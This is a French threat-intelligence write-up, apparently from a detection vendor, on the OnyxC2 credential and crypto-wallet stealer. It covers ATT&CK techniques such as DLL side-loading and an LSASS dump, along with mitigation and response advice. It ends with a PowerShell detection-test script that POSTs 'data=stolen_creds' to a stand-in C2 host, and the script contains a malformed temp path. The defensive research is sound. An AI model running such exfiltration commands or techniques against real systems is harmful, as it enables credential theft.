Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
OnyxC2 est un stealer émergent de malware en tant que service conçu pour cibler les identifiants, les extensions d’authentification à deux facteurs et les portefeuilles de cryptomonnaie sur environ 210 applications. La plateforme offre une trousse à outils à vocation commerciale complète, comprenant un panneau de gestion, un générateur et une fonctionnalité d’accès à distance. Il repose également sur des méthodes d’évasion avancées, notamment le chargement de DLL avec des binaires signés surdimensionnés et des composants de charge utile cryptés.
Enquête
Les chercheurs de BlackFog ont examiné plusieurs échantillons d’OnyxC2 et ont découvert une méthode de chargement de DLL qui abuse d’un exécutable hôte signé en conjonction avec une DLL malveillante de plus de 120 Mo déguisée en bibliothèque graphique NVIDIA. L’analyse réseau a montré que le malware communiquait via HTTPS avec un point d’API backend spécifique. Les chercheurs ont également trouvé des superpositions cryptées intégrées dans la DLL, aidant le malware à éviter les analyses statiques simples.
Atténuation
Le déploiement de contrôles anti-exfiltration de données au niveau de l’endpoint peut aider à bloquer le trafic sortant non autorisé, quel que soit le processus utilisé. Les équipes de sécurité devraient surveiller les chargements de DLL suspects associés aux binaires signés et enquêter sur les fichiers inhabituellement volumineux apparaissant dans les chemins accessibles en écriture par l’utilisateur. Des politiques de contrôle des applications strictes et la surveillance des tâches planifiées non autorisées sont également recommandées.
Réponse
Si une activité OnyxC2 est détectée, isolez immédiatement le système affecté pour stopper le vol de données supplémentaire. Capturez un dump mémoire complet pour récupérer la charge utile décryptée et vérifiez la présence de sessions HVNC actives ou d’activité proxy SOCKS5. Passez en revue toutes les tâches planifiées créées récemment et inspectez les magasins d’identifiants de navigateur pour toute preuve de compromission.
graph TB %% Définitions des classes classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Accès initial et exécution action_user_exec[« <b>Action</b> – <b idea=’T1204.002’>Exécution par l’utilisateur : Fichier malveillant</b><br/>Description : Les victimes sont incitées à télécharger<br/>des archives protégées par mot de passe contenant<br/>des installateurs malveillants déguisés en logiciels légitimes. »] class action_user_exec action action_side_loading[« <b idea=’T1574.002’>Détournement du flux d’exécution : Chargement latéral de DLL</b><br/>Description : Utilise un exécutable légitime signé numériquement<br/>pour charger une DLL malveillante et volumineuse<br/>nommée borlndmm.dll. »] class action_side_loading action malware_dll[« <b idea=’T1027.001’>Fichiers ou informations obfusqués : Remplissage binaire</b><br/>Description : La DLL est gonflée à plus de 120 Mo avec<br/>des fonctions graphiques NVIDIA légitimes afin de<br/>contourner les scanners de sécurité. »] class malware_dll malware %% Persistance et commande et contrôle action_persistence[« <b idea=’T1547’>Persistance</b><br/>Description : Utilise des capacités facultatives de<br/>démarrage automatique via des tâches planifiées. »] class action_persistence action action_c2[« <b idea=’T1071.001’>Commande et contrôle : Protocole de couche applicative</b><br/>Description : Communication régulière avec le backend via HTTPS sur<br/>/backend/api/app.php, souvent en utilisant Cloudflare<br/>comme intermédiaire pour plus de discrétion. »] class action_c2 action %% Découverte et accès aux identifiants action_discovery[« <b idea=’T1217’>Découverte</b><br/>Description : Collecte des informations de navigateur, y compris<br/>les identifiants enregistrés et les cookies de 45 navigateurs<br/>basés sur Chromium et Gecko. »] class action_discovery discovery action_cred_mgr[« <b idea=’T1555.005’>Accès aux identifiants : Identifiants des gestionnaires de mots de passe</b><br/>Description : Cible 5 applications différentes de gestion<br/>de mots de passe afin de voler des identifiants. »] class action_cred_mgr discovery action_lsass[« <b idea=’T1003.001’>Accès aux identifiants : Extraction des identifiants du système d’exploitation</b><br/>Description : Effectue un dump de la mémoire LSASS afin d’obtenir<br/>des identifiants. »] class action_lsass discovery %% Exfiltration action_exfil[« <b idea=’T1041’>Exfiltration via le canal C2</b><br/>Description : Les données volées, y compris les mots de passe, les cookies<br/>et les informations de portefeuille, sont téléversées via la<br/>requête action=up_d. »] class action_exfil exfiltration %% Flux des connexions action_user_exec –>|mène_à| action_side_loading action_side_loading –>|utilise| malware_dll malware_dll –>|établit| action_persistence action_persistence –>|initie| action_c2 action_c2 –>|déclenche| action_discovery action_discovery –>|mène_à| action_cred_mgr action_discovery –>|mène_à| action_lsass action_cred_mgr –>|fournit_des_données_pour| action_exfil action_lsass –>|fournit_des_données_pour| action_exfil action_exfil –>|communique_via| action_c2
Flux d’attaque
Détections
Commandement et Contrôle suspect par demande DNS de domaine de premier niveau (TLD) inhabituel (via dns)
Voir
IOCs (HashSha256) pour détecter : À l’intérieur d’OnyxC2 : Le nouveau stealer ciblant 210 applications
Voir
IOCs (SourceIP) pour détecter : À l’intérieur d’OnyxC2 : Le nouveau stealer ciblant 210 applications
Voir
IOCs (DestinationIP) pour détecter : À l’intérieur d’OnyxC2 : Le nouveau stealer ciblant 210 applications
Voir
Détection de communication C2 et anonymisation TOR du stealer OnyxC2 [Proxy]
Voir
Détection de l’Autorun et de l’activité de Keylogger dans une tâche planifiée OnyxC2 [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : La vérification pré-vol des télémetries et du point de référence doit avoir été réussie.
Raisons : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.
-
Narratif des attaques & Commandes : L’adversaire cherche à exfiltrer des identifiants de navigateur volés. Pour éviter la détection par la surveillance de la sécurité réseau, il déploie un binaire Tor portable pour créer un tunnel anonymisé. Une fois le tunnel établi, le malware initie une connexion à son serveur de Commandement & Contrôle (C2). Pour se fondre dans le trafic web légitime, le malware falsifie son User-Agent pour apparaître comme « Cloudflare » et cible un point d’API spécifique hébergé derrière un proxy Cloudflare. Cette séquence est conçue pour déclencher la corrélation de la règle de détection de
torarguments en ligne de commande et le/backend/api/app.phpmodèle d’URL spécifique. -
Script de test de régression :
# Simulation de la communication du stealer OnyxC2 # 1. Simuler la présence de Tor (Créer un comportement de fichier/processus factice) # Dans un scénario réel, il s'agirait du tor.exe réel $TorPath = "$env:TEMPtor.exe" "Contenu binaire simulé de Tor" | Out-File -FilePath $TorPath # Créer un événement d'exécution de processus pour 'tor' via la ligne de commande Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo exécution du service tor" -WindowStyle Hidden # Pour s'assurer que la logique de détection 'command_line|contains: tor' frappe, # nous exécutons une commande qui inclut la chaîne 'tor' cmd.exe /c "echo initialisation du proxy tor..." # 2. Simuler la connexion réseau C2 # Nous utilisons PowerShell pour simuler une connexion réseau avec l'URL et le User-Agent spécifiques $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Tentative de communication C2 vers $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Commandes de nettoyage :
# Supprimer les artefacts simulés Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Nettoyage de la simulation terminé."